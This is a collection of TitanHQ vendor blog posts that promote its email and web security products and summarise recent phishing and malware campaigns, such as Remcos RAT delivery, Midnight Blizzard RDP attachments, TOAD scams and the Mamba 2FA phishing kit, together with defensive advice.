Virus Bulletin is a testing and certification body that has an excellent reputation within the information security community. Virus Bulletin performs independent tests of security solutions and has been reviewing, benchmarking, and issuing certifications for security products for more than 2 decades.

The spam, malware, and phishing identification tests are conducted over a 16-day period each month, with the final results published each quarter. For the past two quarters, TitanHQ’s email security solutions have achieved VBSpam+ certification, and the results from October and November indicate SpamTitan email security and the PhishTitan anti-phishing solutions are on track to receive their third consecutive quarterly VBSpam+ certification.

The interim results for November are based on an evaluation of almost 125,000 emails. TitanHQ’s solutions correctly identified all malware and phishing emails over that period, and it was nearly a clean sweep of 100% scores; however, there was a narrow miss on blocking non-malicious spam emails, as while the vast majority of spam emails were correctly identified, 2 spam emails were unfortunately miscategorized.

The flawless results for malware blocking and phishing identification by TitanHQ’s cloud-based anti-spam software clearly demonstrate the superb reliability and effectiveness of TitanHQ’s email security solutions and validate what our customers already know – That you can rely on TitanHQ to keep your email accounts free from threats.

“We are thrilled to have significantly outperformed our main competitors and surpassed the industry average,” said Ronan Kavanagh, CEO at TitanHQ. “Our unwavering commitment to providing unmatched email security is evident in these results, and we remain dedicated to protecting our clients from evolving cyber threats.”

In addition to providing a cutting-edge, easy to use, email filtering service, TitanHQ’s cybersecurity portfolio also includes a comprehensive security awareness training and phishing simulation platform – SafeTitan; a DNS-based web filtering solution for blocking Internet threats and controlling internet access – WebTitan; an easy-to-use and cost-effective email archiving solution – ArcTitan; and an email encryption solution for securing sensitive data – EncryptTitan.

All TitanHQ solutions are cloud-based and easy to implement and use, even by individuals with little technical expertise. These solutions can be used by businesses of all sizes and TitanHQ also offers anti-spam solutions for managed service providers to allow them to provide comprehensive security services to their clients.

For more information about these solutions or joining our partner program, give the TitanHQ team a call today and be sure to check out these anti-spam tips.

Excel File Attachments Used in Phishing Campaign to Deliver Fileless Remote Access Trojan

A phishing campaign has been identified that uses purchase order-related lures and Excel file attachments to deliver the Remcos RAT, a commercially available malware variant that gives threat actors remote access to an infected device.  The malware allows the threat actor to log keystrokes, record audio via the microphone, and take screenshots and provides a foothold allowing an extensive compromise. Infection with the Remcos RAT invariably involves data theft and could lead to a ransomware attack and extortion.

Businesses with antivirus software installed are unlikely to be protected. While antivirus software is effective at detecting and neutralizing malware, the Remcos RAT is poorly detected as it is fileless malware that runs in memory and does not install files on the disk. The campaign, detected by researchers at FortiGuard Labs, targets Windows users and starts with a phishing email with an encrypted Excel attachment. The emails purport to be a purchase order and include a malicious Excel file attachment. The Excel file uses OLE objects to exploit an old vulnerability in Office, tracked as CVE-2017-0199. Successful exploitation of the vulnerability will see an HTML Application (HTA) file downloaded, which is launched using mshta.exe. The file is heavily obfuscated to evade security solutions, and its function is to download and execute a binary, which uses process hollowing to download and run the Remcos RAT in the memory.

The Remcos RAT is used to enumerate and terminate processes, execute commands, capture sensitive data, and download additional malware payloads. Since the Remcos RAT runs in the memory, it will not survive a reboot. To achieve persistence, it runs the registry editor (reg.exe) to edit the Windows Registry to add a new auto-run item to ensure it is launched after each reboot.

Since the initial contact is made via email, an advanced email security solution with email sandboxing and AI- and machine learning capabilities should ensure the email is identified as malicious and blocked to prevent delivery. Should the email be delivered and the attachment opened, end users are informed that the document is protected. They are presented with a blurred version of the Excel file and are told they need to enable editing to view the content – a red flag that should be identified by security-aware employees. If that red flag is missed, enabling content will trigger the exploitation of the vulnerability that ultimately delivers the Remcos RAT. Businesses with an advanced DNS-based web filter will have another layer of protection, as the URLs hosting the malicious files should be blocked.

TitanHQ offers cutting-edge cybersecurity solutions that provide exceptional protection against phishing, BEC, and malware attacks, blocking the initial emails and connections to malicious websites to prevent end users from viewing malicious emails (SpamTitan) and preventing malicious file downloads from the Internet (WebTitan). In November 2024 tests by Virus Bulletin, TitanHQ’s SpamTitan Solution had a 100% phishing and malware block rate. TitanHQ also provides a comprehensive security awareness training platform (SafeTitan) to teach cybersecurity best practices and keep employees aware of the latest threats. The platform also incorporates a phishing simulator for reinforcing training. Give the TitanHQ team a call today for more information on TitanHQ solutions and how they can improve your defenses against email, web, SMS, and voice-based threats at your business.

A Russian APT Group is Conducting a Massive Spear Phishing Campaign

The notorious Russian advanced persistent threat (APT) group Midnight Blizzard (aka Cozy Bear, APT29) has been conducting a massive spear phishing campaign on targets in the United Kingdom, Europe, Australia, and Japan. Midnight Blizzard is a hacking group with strong links to Russia’s Foreign Intelligence Service (SVR) which engages in espionage of foreign interests and seeks persistent access to accounts and devices to steal information of interest to the SVR. The latest campaign is a highly targeted information-gathering exercise that was first observed on October 22, 2024.

While Midnight Blizzard’s spear phishing attacks are usually conducted on government officials and individuals in non-governmental organizations (NGOs), individuals in academia and other sectors have also been targeted. The spear phishing attacks were identified by Microsoft Threat Intelligence which reports that thousands of emails have been sent to more than 100 organizations and the campaign is ongoing. While spear phishing is nothing new, Midnight Blizzard has adopted a new tactic in these attacks and is sending a signed Remote Desktop Protocol (RDP) configuration file as an email attachment, with a variety of lures tailored to the individual being targeted. Some of the intercepted emails impersonated Microsoft, others impersonated cloud service providers, and several of the emails used lures related to zero trust. The email addresses used in this campaign have been previously compromised in other Midnight Blizzard campaigns.

Amazon has also reported that it detected phishing emails that impersonated Amazon Web Services (AWS), attempting to trick the recipients into thinking AWS domains were used; however, the campaign did not seek AWS credentials, as Midnight Blizzard is targeting Windows credentials. Amazon immediately started the process of seizing the domains used by Midnight Blizzard to impersonate AWS and that process is ongoing.

RDP files contain automatic settings and resource mappings and are created when a successful connection to an RDP server occurs. The attached RDP files are signed with a Lets Encrypt certificate and extend features and resources of the local system to a remote server under the attacker’s control. If the RDP file is executed, a connection is made to a server under the control of Midnight Blizzard, and the targeted user’s local device’s resources are bidirectionally mapped to the server.

The server is sent resources including logical hard disks, clipboard contents, printers, connected devices, authentication features, and Windows operating system facilities. The connection allows the attacker to install malware, which is set to execute via AutoStart folders, steal credentials, and download other tools to the user’s device, including remote access trojans to ensure that access to the targeted system is maintained when the RDP session is closed.

Since the emails were sent using email addresses at legitimate organizations, they are unlikely to be flagged as malicious based on reputation checks by anti-spam software, although may be detected by more advanced anti-spam services that incorporate machine learning and AI-based detection mechanisms and email sandboxing. You should configure your spam antivirus filter to block emails containing RDP files and other executable files and configure your firewall to block outbound RDP connection attempts to external or public networks. Multifactor authentication should be configured on all accounts to prevent compromised credentials from granting access, and consider blocking executable files from running via your endpoint security software is the executable file is not on a trusted list. Also, ensure that downloaded files are scanned using antivirus software. A web filter can provide added protection against malicious file downloads from the internet.

An anti-phishing solution should also be considered for augmenting the protection provided through Microsoft Defender and EOP for Microsoft 365. PhishTitan from TitanHQ has been shown to improve protection and block threats that Microsoft’s anti-phishing solution fails to detect, augmenting rather than replacing the protection provided by EOP and Defender. It is also important to provide security awareness training to the workforce and ensure that spear phishing and RDP file attachments are included in the training. Also, consider conducting spear phishing simulations.

New Tactics Used by Threat Actors for Phishing, Malware Delivery, and Extortion

Several new campaigns have been detected in recent weeks that use diverse tactics to trick people into disclosing sensitive information and installing malware.

Cybercriminals Target Crypto Wallets via Webflow Sites

Webflow is a software-as-a-service company that businesses can use to accelerate website development. The platform makes it easier to create websites and web pages, simplifying and eliminating many of the complex tasks to speed up website creation. Cybercriminals have taken advantage of the platform and are using it to rapidly spin up phishing pages and create pages to redirect users to malicious sites. One of the main advantages of Webflow compared to alternative platforms is the ease of creating custom subdomains, which can help phishers make their phishing pages more realistic. Subdomains can be created to mimic the login pages that they are impersonating, increasing the probability that individuals will be fooled into disclosing their credentials.

The number of detected phishing pages on Webflow has increased sharply, especially for crypto scams. One of the campaigns impersonated the Trezo hardware wallet. Since the subdomain can be customized to make the phishing page appear official, and screenshots of the actual Trexor site are used, these phishing pages can be very convincing. In these campaigns, the aim is to steal the seed phrases of the victim to allow the threat actor to access cryptocurrency wallets and transfer the funds. In one campaign, when the seed phrase is disclosed, the user is told their account has been suspended for unauthorized activity and they are told to launch a chat service for support. The chat service is manned by the threat actor who keeps the victim engaged while their wallet is emptied.

Hackers Use Deepfakes to Target Finance Professionals

The cost of artificial intelligence (AI) solutions is falling and cybercriminals are taking advantage. AI is increasingly being used to manipulate images, audio, and video recordings to make their scams more convincing. These deepfakes are realistic and more effective at tricking individuals into making fraudulent wire transfers than business email compromise scams, as they include deepfake videos of the person being spoofed. Cybercriminals use AI tools to create deepfakes from legitimate video presentations and webinars, impersonating an executive such as the CEO or CFO in an attack on finance team members. The aim is to trick the employees into making a wire transfer. Earlier this year, the engineering group Arup was targeted using a deepfake of the company CFO, and $25 million was transferred to the scammers in transfers to five different bank accounts.

Vendors are often spoofed in deepfake scams to trick their clients into wiring payments to attacker-controlled bank accounts. A recent survey by Medius revealed that 53% of finance professionals in the UK and US had experienced at least one attempted deepfake scam. These scams may occur over the phone, with the deepfake occurring in real-time, and there have been many cases of deepfake impersonations over video conferencing platforms such as Microsoft Teams and Zoom.

North Korean Hackers Target Developers with Fake Job Interviews

The North Korean hacking team, Lazarus Group, is known to use diverse tactics in its attacks. The group has now been observed infiltrating business networks by obtaining positions as IT workers. According to Mandiant, dozens of Fortune 100 companies have been tricked into hiring workers from North Korea, who steal corporate data after being hired. One UK firm discovered they had been duped 4 months after employing an It worker who was actually based in North Korea. The IT worker used the network access provided to siphon off sensitive data, and when the worker was sacked for poor performance, demanded a ransom to return the stolen data. Researchers believe the data was provided to North Korea.

The Lazarus Group has also been targeting developers through fake interviews. The group hosts fake coding assessments on legitimate repositories such as GitHub and hides malicious code in those repositories, especially in Python files. The developers are tricked into downloading the code and are tasked with finding and fixing a bug but will inadvertently execute the malicious code regardless of whether they complete the assessment. The hackers often pose as legitimate companies in the financial services.

Legitimate File-Hosting Services Used for Phishing Attacks and Malware Distribution

One of the ways that cybercriminals attempt to bypass filtering mechanisms is to use legitimate hosting services for phishing and malware delivery. Dropbox, OneDrive, Google Drive, and SharePoint are all commonly used by cybercriminals. These services are used by businesses for storing and sharing files and for collaboration, so these services are often trusted. They are also often trusted by security solutions. Tactics commonly used include sharing links to files hosted on these services via phishing emails, often restricting access to the files to prevent detection by security solutions. For instance, the user is required to be logged in to access the file. Files may be hosted in view-only mode to avoid detection by security solutions, with social engineering techniques used to fool the user into downloading the files.

Cybercriminals are constantly evolving their tactics to phish for credentials, distribute malware, and gain unauthorized access to sensitive data. Businesses need to adopt a defense-in-depth approach to security, adding several layers to their defenses to combat new threats. These measures include an advanced spam filtering service with machine learning capabilities and email sandboxing, a web filter for blocking access to malicious websites and preventing malware downloads from the Internet, anti-phishing solutions for Microsoft 365 environments to block the threats that Microsoft often fails to detect, and comprehensive security awareness training for the workforce.

Cybercriminals will continue to evolve their tactics, so security solutions should also be able to evolve and be capable of detecting zero-day threats. With TitanHQ as your security partner, you will be well protected against these rapidly changing tactics.  Give the TitanHQ team a call today to find out more about improving your technical and human defenses against these threats.

Threat Actors Increasingly Using Scripts in Emails for Malware Delivery

For many years, cybercriminals have favored Office documents for distributing malware. These documents are familiar to most workers and are likely to be opened because they are so familiar and used so often. The documents may contain hyperlinks to malicious websites where malware is downloaded, but the easiest method is automating the delivery of malware using a malicious macro. If that macro is allowed to run, the infection process will be triggered.

Microsoft has helped to make documents and spreadsheets more secure by disabling macros by default if they have been delivered via the Internet and increasing numbers of companies are providing workforce security awareness training and instructing their employees not to enable content on Office documents delivered via the Internet. It has become much harder for cybercriminals to distribute malware using these file formats, so they have turned to script languages for malware delivery.

The use of VBScript and JavaScript in malware distribution campaigns has been increasing, with these executable files often hidden from security solutions by adding them to archive files. The scripts used in campaigns are snippets of code that include command sequences, which automate the downloading and execution of malware, often only operating within the system’s memory to avoid detection. The user is likely to be unaware that malware installation has been triggered.

For example, in one campaign, a malicious VBS script was hidden in an archive file to evade email security defenses. If extracted and executed, the script executes PowerShell commands, which can be difficult for security solutions to identify as malicious. PowerShell triggered the BitsTransfer utility to fetch another PowerShell script, which downloaded and decoded Shellcode, which in turn loaded a second shellcode that used the Windows wab.exe utility to download an encrypted payload. The shellcode decrypted and incorporated the payload into wab.exe, turning it into the remote access trojan, Remcos RAT. This multi-stage infection process used living-off-the-land techniques to evade security solutions, and it all started with an email that used social engineering to trick the recipient into executing the script.

Using this attack as an example, there are opportunities for identifying the email for what it really is. Businesses need to ensure they have advanced email security defenses in place such as an advanced spam filter for Office 365 or a machine-learning/AI-driven spam filtering service. These services perform standard checks of inbound email, such as anti-spoofing and reputation checks on the sender, Bayesian analysis to determine whether the email is likely to be spam, but also machine learning checks, where the inbound message is compared against the emails typically received by a business and is flagged if any irregularities are found.

Anti-virus scans are useful for detecting malware, but these checks can often be evaded by adding malicious scripts to archive files, and the multi-stage process involved in infection is often sufficient to defeat signature-based malware detection. An email security solution therefore needs to also use email sandboxing. All attachments capable of being used for malicious purposes are scanned with an anti-virus engine and are then sent to the sandbox for deep analysis. Malware sandboxing for email is important, as it detects malware not by its signature, but by its behavior, which is vital for identifying script-based malware delivery. While there are sandboxing message delays, it prevents many costly malware infections.

SpamTitan, TitanHQ’s cloud-based anti-spam service, incorporates these checks to provide exceptional malware detection. In recent independent tests, SpamTitan blocked 100% of malware and had a 99.99% phishing catch rate and a 0.000% false positive rate. In addition to using an advanced spam filter, businesses can further reduce risk by blocking delivery of the 50 or so archive file formats supported by Windows if they are not used by the business.

It is also important to provide continuous security awareness training to the workforce to improve awareness of threats and the new tactics, techniques, and procedures being used by threat actors to trick individuals into providing them with network access. This is easily down with TitanHQ’s SafeTitan security awareness training platform solution, especially when combined with phishing simulations.

Cyberattacks targeting individuals are increasing in sophistication and standard security defenses are often evaded. To find out more about improving your defenses against sophisticated phishing, malware, and business email compromise threats, give the TitanHQ team a call. Improving your defenses is likely to be much cheaper than you think.

Multiple Accounts Compromised in Targeted Phishing Campaigns

The purpose of phishing attacks is usually to steal credentials to gain unauthorized access to accounts. If an employee falls for a phishing attack and their credentials are obtained, the attacker can gain access to that user’s account and any data contained therein. That access can be all that is required for the threat actor to achieve a much more extensive compromise.

Oftentimes, a threat actor conducts a more extensive phishing campaign on multiple employees at the same organization. These phishing attacks can be harder to spot as they have been tailored to that specific organization. These attacks usually spoof an internal department with the emails seemingly sent from a legitimate internal email account. The emails may address each individual by name, or appear to be broadcast messages to staff members. One successful campaign was identified by the Office of Information Technology at Boise State University, although not before several employees responded to the emails and disclosed their credentials. In this campaign, the emails were addressed to “Dear Staff,” and appeared to have been sent from the postmaster account by “Health Services,” purporting to be an update on workplace safety. The emails had the subject line “Workplace Safety: Updates on Recent Health Developments,” with a similar campaign indicating a campylobacter infection had been reported to the health department.

In the message, recipients were advised about a health matter involving a member of staff, advising them to contact the Health Service department if they believed they had any contact with the unnamed worker.  In order to find out if they had any contact with the worker, the link must be clicked. The link directed the user to a fraudulent login page on an external website, where they were required to enter their credentials. The login page had been created to look like it was a legitimate Boise State University page, captured credentials, and used a Duo Securit notification to authorize access to their account.

These targeted campaigns are now common, especially at large organizations where it is possible to compromise a significant number of accounts and is worth the attacker’s time to develop a targeted campaign. Another attack was recently identified by the state of Massachusetts. The attacker created a fake website closely resembling the HR/CMS Employee Self-Service Time and Attendance (SSTA) system, which is used for payroll. Employees were tricked into visiting the portal and were prompted to enter their credentials, which the attacker used to access their personal and direct deposit information. In this case, the aim of the attack appeared to be to change direct deposit information to have the employees’ wages paid into the attacker’s account. Several employees were fooled by the scam; although in this case the attack was detected promptly and the SSTA system was disabled to prevent fraudulent transfers.

A different type of campaign recently targeted multiple employees via email, although the aim of the attack was to grant the threat actor access to the user’s device by convincing them to install the legitimate remote access solution, AnyDesk. The threat actor, the Black Basta ransomware group, had obtained employee email addresses and bombarded them with spam emails, having signed them up for newsletters via multiple websites. The aim was to create a legitimate reason for the next phase of the attack, which occurred via the telephone, although the group has also been observed using Microsoft Teams to make contact. The threat actor posed as the company’s IT help desk and offered assistance resolving the spam problem they created, which involved downloading AnyDesk and granting access to their device. During the session, tools are installed to provide persistent access. The threat actor then moved laterally within the network and extensively deployed ransomware.

These attacks use social engineering to exploit human weaknesses. In each of these attacks, multiple red flags should have been spotted revealing these social engineering attempts for what they are but more than one employee failed to spot them. It is important to provide security awareness training to the workforce to raise awareness of phishing and social engineering threats, and for training to be provided regularly. Training should include the latest tactics used by threat actors to breach networks, including phishing attacks, fake tech support calls, malicious websites, smishing, and vishing attacks.

A phishing simulator should be used to send realistic but fake phishing emails internally to identify employees who fail to spot the red flags. They can then receive additional training relative to the simulation they failed. By providing regular security awareness training and conducting phishing simulations, employers can develop a security culture. While it may not be possible to prevent all employees from responding to a threat, the severity of any compromise can be limited. With TitanHQ’s SafeTitan solution, it is easy to create and automate tailored training courses and phishing simulations that have been shown to be highly effective at reducing susceptibility to phishing and other threats.

Since threat actors most commonly target employees via email, it is important to have robust email defenses to prevent the threats from reaching employees. Advanced anti-spam services such as SpamTitan incorporate a wide range of threat detection methods to block more threats, including reputation checks, extensive message analysis, machine-learning-based detection, antivirus scans, and email sandboxing for malware detection.  SpamTitan has been shown to block more than 99.99% of phishing threats and 100% of malware.

TOAD Attacks: New Voice-Based Phishing Techniques Used in Attacks on Businesses

Phishing is one of the most effective methods used by cyber actors to gain initial access to protected networks Phishing tactics are evolving and TOAD attacks now pose a significant threat to businesses. TOAD stands for Telephone-Oriented Attack Delivery and is a relatively new and dangerous form of phishing that involves a telephone call, although there are often several different elements to a TOAD attack which may include initial contact via email, SMS messages, or instant messaging services.

TOAD attacks often start with an information-gathering phase, where the attacker obtains personal information about individuals that can then be targeted. That information may only be a mobile phone number or an email address, although further information is required to conduct some types of TOAD attacks.

One of the most common types of TOAD attacks is callback phishing. The attacker impersonates a trusted entity in an email and makes a seemingly legitimate request to make contact. There is a sense of urgency to get the targeted individual to take prompt action. Rather than use a hyperlink in the message to direct the user to a website, the next phase of the attack takes place over the telephone or a VOIP-based service such as WhatsApp. A phone number is included that must be called to resolve a problem.

If the call is made, the threat actor answers and during the call, trust is built with the caller and the threat actor makes their request. That could be an instruction to visit a website where sensitive information must be entered or a file must be downloaded. That file download leads to a malware infection.

Several TOAD attacks have involved the installation of legitimate remote access software. One campaign involved initial contact via email about an expensive subscription that was about to be renewed, which required a call to cancel. The threat actor convinces the user to download remote access software which they are told is necessary to prevent the charge being applied, such as to fully remove the software solution from the user’s device.

The user is convinced to give the threat actor access to their device through the software and the threat actor keeps the person on the line while they install malware or perform other malicious actions, reassuring them if they get suspicious.  Other scams involve initial contact about a fictitious purchase that has been made, or a bank scam, where an email impersonates a bank and warns the victim that an account has been opened in their name or a large charge is pending. These attacks result in the victim providing the threat actor with the information they need to access their account.

TOAD attacks often involve the impersonation of a trusted individual, who may be a colleague, client, or even a family member. Since information is gathered before the scam begins, when the call is made, the threat actor can provide that information to the victim to convince them that they are who they claim to be. That information may have been purchased on the dark web or obtained in a previous data breach. For instance, following a healthcare data breach, the healthcare provider may be impersonated, and the attacker can provide medical information in their possession to convince the victim that they work at the hospital.

The use of AI tools makes these scams even more convincing. Deepfakes are used, where a person’s voice is mimicked, or video images are manipulated on video conferencing platforms. Deepfakes were used in a scam on an executive in Hong Kong, who was convinced to transfer around £20 million in company funds to the attacker’s account, believing they were communicating with a trusted individual via a video conferencing platform.

TOAD attacks may be solely conducted over the phone, where the attacker uses call spoofing to manipulate the caller ID to make it appear that the call is coming from a known and previously verified number. Other methods may be used to convince the victim that the reason for the call is genuine, such as conducting a denial-of-service attack to disrupt a service or device to convince the user that there is an urgent IT problem that needs to be resolved. TOAD attacks are increasing because standard phishing attacks on businesses are becoming harder to pull off due to email security solutions, multifactor authentication, and improved user awareness about scam messages.

Unfortunately, there is no single cybersecurity solution or method that can combat these threats. A comprehensive strategy is required that combines technical measures, security awareness training and administrative controls. Advanced anti-spam software with machine learning and AI-based detection can identify the emails that are used for initial contact. These advanced detection capabilities are needed because the initial emails often contain no malicious content, other than a phone number. SpamTitan, TitanHQ’s cloud-based anti-spam service, can detect these initial emails through reputation checks on the sender’s IP address, email account, and domain, and machine learning is used to analyze the message content, including comparing emails against the typical messages received by a business.

WebTitan is a cloud-based DNS filter that is used to control the web content that users can access. WebTitan will block access to known malicious sites and can be configured to prevent certain file types from being downloaded from the internet, such as those commonly used to install malware, unauthorized apps, and remote access solutions.

Regular security awareness training is a must. All members of the workforce should be provided with regular security awareness training and TOAD attacks should feature in the training content. SafeTitan, TitanHQ’s security awareness training platform and phishing simulator, makes it easy for businesses to create and automate training courses for the workforce. Employees should be trained in how to identify a TOAD attack, told not to trust caller ID alone, to avoid clicking links in emails and SMS messages, and to be vigilant when receiving or making calls, and to report any suspicious activity and immediately end a call if something does not seem right.

Mamba 2FA Phishing Kit Used to Bypass MFA on Microsoft 365 Accounts

Researchers have identified a new phishing kit that is being used to steal credentials for Microsoft 365 accounts and gain access to accounts protected by multi-factor authentication (MFA). The phishing kit, called Mamba 2FA is a cause of concern as it has the potential to be widely adopted given its relatively low price and there are signs it is proving popular with cybercriminals since its release in late 2023. Phishing kits make it easy for low-skilled cybercriminals to conduct sophisticated attacks as they provide all the tools required to breach accounts. The Mamba 2FA kit includes the necessary infrastructure to conduct phishing campaigns, masks IP addresses to prevent them from being blocked, and updates the phishing URLs frequently to ensure they remain active and are not blocked by security solutions.

The Mamba 2FA kit includes phishing pages that mimic Microsoft services such as OneDrive and SharePoint, and the pages can be customized to create realistic phishing URLs for targeting businesses, including allowing the business logo and background images to be added to the login page. Since businesses often have MFA enabled, simply stealing Microsoft credentials is not sufficient, as the MFA will block any attempt to use the credentials for unauthorized access. Like several other popular phishing kits, the Mamba 2FA kit supports adversary-in-the-middle (AitM) attacks, incorporating proxy relays to steal one-time passcodes and authentication cookies in real time. When credentials are entered into the phishing page, they are relayed to Microsoft’s servers in real-time and Microsoft’s responses are relayed back to the victim, including MFA prompts, which allows the threat actor to steal the session cookie and gain access to the user’s account.

Phishing kits such as Mamba 2FA pose a serious threat to businesses, which should take steps to protect against attacks. The AitM tactics can defeat less secure forms of MFA that are based on one-time passwords but are not effective against hardware-based MFA. Implementing phishing-resistant MFA will ensure these attacks do not succeed. Other recommended controls include geo-blocking and allowlisting for IPs and devices. While these advanced phishing kits are effective, threat actors must convince people to click a link in an email and disclose their login credentials, and with advanced email security solutions these phishing threats can be identified and blocked before they reach inboxes. Training should also be provided to the workforce to help with the identification and avoidance of phishing.

TitanHQ can help through the SpamTitan cloud-based spam filtering service and the SafeTitan security awareness training and phishing simulation platform. SpamTitan incorporates reputation checks, Bayesian analysis, greylisting, machine learning-based detection, antivirus scans, and email sandboxing to block phishing and malware threats. Independent tests demonstrated SpamTitan was one of the best spam filtering solutions for businesses at blocking threats, with a 99.99% phishing block rate and a 100% malware block rate.

The SafeTitan security awareness training platform makes it easy for businesses to provide regular cybersecurity awareness training. The platform includes more than 80 training modules, videos, and webinars, with hundreds of phishing simulation templates based on real-world phishing examples. Regular training and phishing simulations have been proven to be highly effective at reducing susceptibility to phishing and other threats targeting employees. This month, TitanHQ has also launched its security awareness training platform for MSPs, which has been specifically developed to make it quick and easy for MSPs to incorporate security awareness training into their service stacks. Speak with TitanHQ today for more information about these and other cybersecurity solutions for combatting the full range of cyber threats.

New Phishing and Malware Delivery Tactics Observed in September

New SEO poisoning, phishing, and deepfake techniques have been identified in campaigns for malware delivery, credential theft, and financial fraud this month. It is important to ensure you have appropriate defenses in place and you update your training programs to raise awareness of these new tactics.

SEO Poisoning Used to Deliver Wikiloader Malware Masquerading as the GlobalProtect VPN

Early in September, Palo Alto Networks reported that its virtual private network, GlobalProtect, was being spoofed in a campaign to deliver Wikiloader (WailingCrab) malware – A malware variant used for delivering other malware payloads onto infected devices. The threat actors behind Wikiloader campaigns sell access to other cybercriminals. An infection with Wikiloader could lead to all manner of other infections.

This campaign was focused on the higher education and transportation sectors and like many malware distribution schemes used search engine (SEO) poisoning to get malicious websites to appear high in the search engine listings for key search terms targeting those sectors. The campaign claimed to offer a download of GlobalProtect and used a combination of cloned webpages and cloud-based git repositories and delivered a file – named GlobalProtect64.exe – offering the VPN. The file delivered was a trojanized version of a share trading application, that sideloaded a malicious DLL that allowed the execution of shellcode that delivered Wikiloader from a remote server. On execution, the user was told that GlobalProtect could not be installed due to missing libraries.

This was a marked change from other campaigns that have distributed Wikiloader, which has previously been delivered via phishing emails. This is the first time that GlobalProtect has been spoofed to deliver Wikiloader. The change in tactics is believed to be due to a different initial access broker starting using Wikiloader.

Threat Actors Increasingly Using Archive Files for Email Malware Distribution

One of the most common ways of delivering malware is via phishing emails with malicious attachments. For years, the most common method involved emailing Microsoft Office documents that contained malicious macros. If the files are opened and macros are allowed to run, a malware download will be triggered. A variety of file attachments are now used for malware delivery, including PDF files, which allow links, scripts and executable files to be incorporated into the files. To hide malicious files from email security solutions, they are often added to archive files.

According to a recent analysis by HP security researchers, 39% of malware deliveries came from archive files in Q2, 2024, up from 27% the previous quarter. The researchers noted that in addition to using the most popular and well-known archive formats such as.zip, .rar, and .7z, more obscure archive files are increasingly being used. The researchers identified around 50 different archive file formats in Q2. Threat actors are also moving away from documents and are instead favoring script languages such as VBScript and JavaScript for malware delivery, with the scripts hidden in encrypted archive files to evade email security defenses.

End users are less likely to identify obscure archive formats and script files as malicious, as security awareness training has tended to focus on malicious documents containing macros. Security awareness training programs should inform employees about the different file types that may be used for malware delivery and safeguards should be implemented to reduce the risk of malware downloads, such as advanced spam filter software and web filters for blocking malware downloads from the Internet.

Deepfakes Increasingly Used in Attacks on Businesses

Deepfakes are increasingly being used in attacks on businesses on both sides of the Atlantic, and these scams have proved to be highly effective in financial scams. According to a survey conducted by Medius, around half of UK and US businesses have been targeted with deepfake scams and around 43% have fallen victim to the scams. Deepfake scams use artificial intelligence to alter images, videos, and audio recordings, making it appear that respected or trusted individuals are requesting a certain action.

The individuals deepfaked in these scams include executives such as the CEO and CFO, as well as vendors/ suppliers. For example, a deepfake of the CEO of a company was used in a video conference call with the company’s employees. In one of these scams, an Arup employee was tricked into making 5 fraudulent transfers to Hong Kong bank accounts before the scam was detected. These scams highlight the importance of covering deepfakes in security awareness training.

TitanHQ Solutions That Can Help Protect Your Business

TitanHQ has developed a range of cybersecurity solutions for businesses and managed service providers to help defend against increasingly sophisticated cyberattacks.

  • SpamTitan Email Security – An advanced AI-driven cloud-based anti-spam service with email sandboxing that has been recently shown to block 99.98% of phishing threats and 100% of malware in independent performance tests.
  • PhishTitan Microsoft 365 Phishing Protection – A next-generation anti-phishing and phishing remediation solution for Microsoft 365 environments that augments native M365 defenses and blocks threats that EOP and Defender misses
  • WebTitan DNS Filter – A cloud-based DNS filtering and web security solution providing AI-driven threat protection with advanced web content controls for blocking malware delivery from the Internet and access to malicious websites.
  • SafeTitan Security Awareness Training – A comprehensive, affordable, and easy-to-use security awareness training and phishing simulation platform that delivers training in real-time in response to security mistakes.

For more information on these solutions, give the TitanHQ sales team a call today. All TitanHQ solutions are available on a free trial and product demonstrations can be arranged on request.

Evidence Found Indicating Cybercriminals Are Using GenAI Tools for Malware Creation

Generative artificial intelligence (GenAI) services are already being leveraged by cybercriminals to create convincing phishing emails, and it appears that these tools are being used for the creation of malware. GenAI services are capable of writing code; however, guardrails have been implemented to prevent malicious uses of these tools, such as the creation of malware. If those guardrails can be circumvented, the creation of malware would no longer be limited to skilled malware developers. Lower-skilled cybercriminals could develop their own malware using GenAI services, and there is growing evidence they are doing just that.

Over the summer, HP security researchers identified an email campaign targeting French users. The phishing email used HTML smuggling (encrypted HTML) to evade detection, and on analysis, the campaign delivered malicious VBScript and JavaScript code that appeared to have been created using GenAI tools. The entire malicious code included comments about what each function does, which is rare in malware development as the exact workings of the code tend not to be described. The comments, along with the use of native language function names and variables all suggest that GenAI was used to create the malware.

The code was used to deliver AsyncRAT malware, a widely available, open source malware that is an information stealer capable of recording the victim’s screen and logging keystrokes. The malware also acts as a malware downloader that can deliver other malware payloads, including ransomware. In this campaign, little technical skill was required as HTML smuggling does not require any programming, the malware being delivered is widely available, and the fact that the comments had not been removed and there was no obfuscation, points to the development of malware by an inexperienced cybercriminal.

There have been other examples of apparent malicious code creation using GenAI, such as a malicious PowerShell script identified earlier this year that was also used to deploy infostealer malware. That campaign targeted users in Germany and impersonated Metro cash-and-carry and was also delivered via email. Just as GenAI tools are helping writers rapidly create written content, GenAI tools can be used to rapidly develop malicious code. ChatGPT and Gemini have guardrails in place that it may be possible to circumvent, but there are many dark LLMs that lack those controls such as WormGPT and FraudGPT. If these tools are leveraged, relatively low-skilled cybercriminals can develop their own malware variants.

Traditional antivirus solutions use signature-based detection. When malware is identified, a signature is added to the antivirus solution for that specific malware variant that allows it to be detected in the future. There is a delay between the creation of malware and the addition of malware signatures to the definition lists of antivirus solutions, during which time malware can easily be smuggled onto devices undetected. If the creation of malware can be accelerated with GenAI tools, cybercriminals will have the upper hand.

The solution for businesses is to deploy security solutions capable of detecting novel malware variants by their behavior rather than a signature. Since malware is commonly delivered via email, having a cloud-based email security solution that incorporates behavioral analysis of attachments will help identify and neutralize these malware variants before they can be installed.

SpamTitan from TitanHQ is a cloud-based antispam software that incorporates email sandboxing. When standard antivirus checks are passed, suspicious emails and attachments are sent to a next-generation email sandbox for deep inspection, where the behavior of the attachments is assessed in an isolated sandbox environment.  If malicious actions are detected, the threat is neutralized. SpamTitan also incorporates AI-based and machine-learning detection mechanisms to assist with malicious email detection, and along with a host of other checks ensure malicious emails are detected and blocked. In recent independent tests, SpamTitan has a 99.99% phishing catch rate and a 100% malware catch rate, with zero false positives.

SpamTitan, like all other TitanHQ cybersecurity solutions, is available on a free trial to allow you to see for yourself the difference it makes. To find out more about protecting your business from increasingly sophisticated threats, give the TitanHQ team a call.

Compromised Credentials and Phishing Most Commonly Used to Access Business Networks

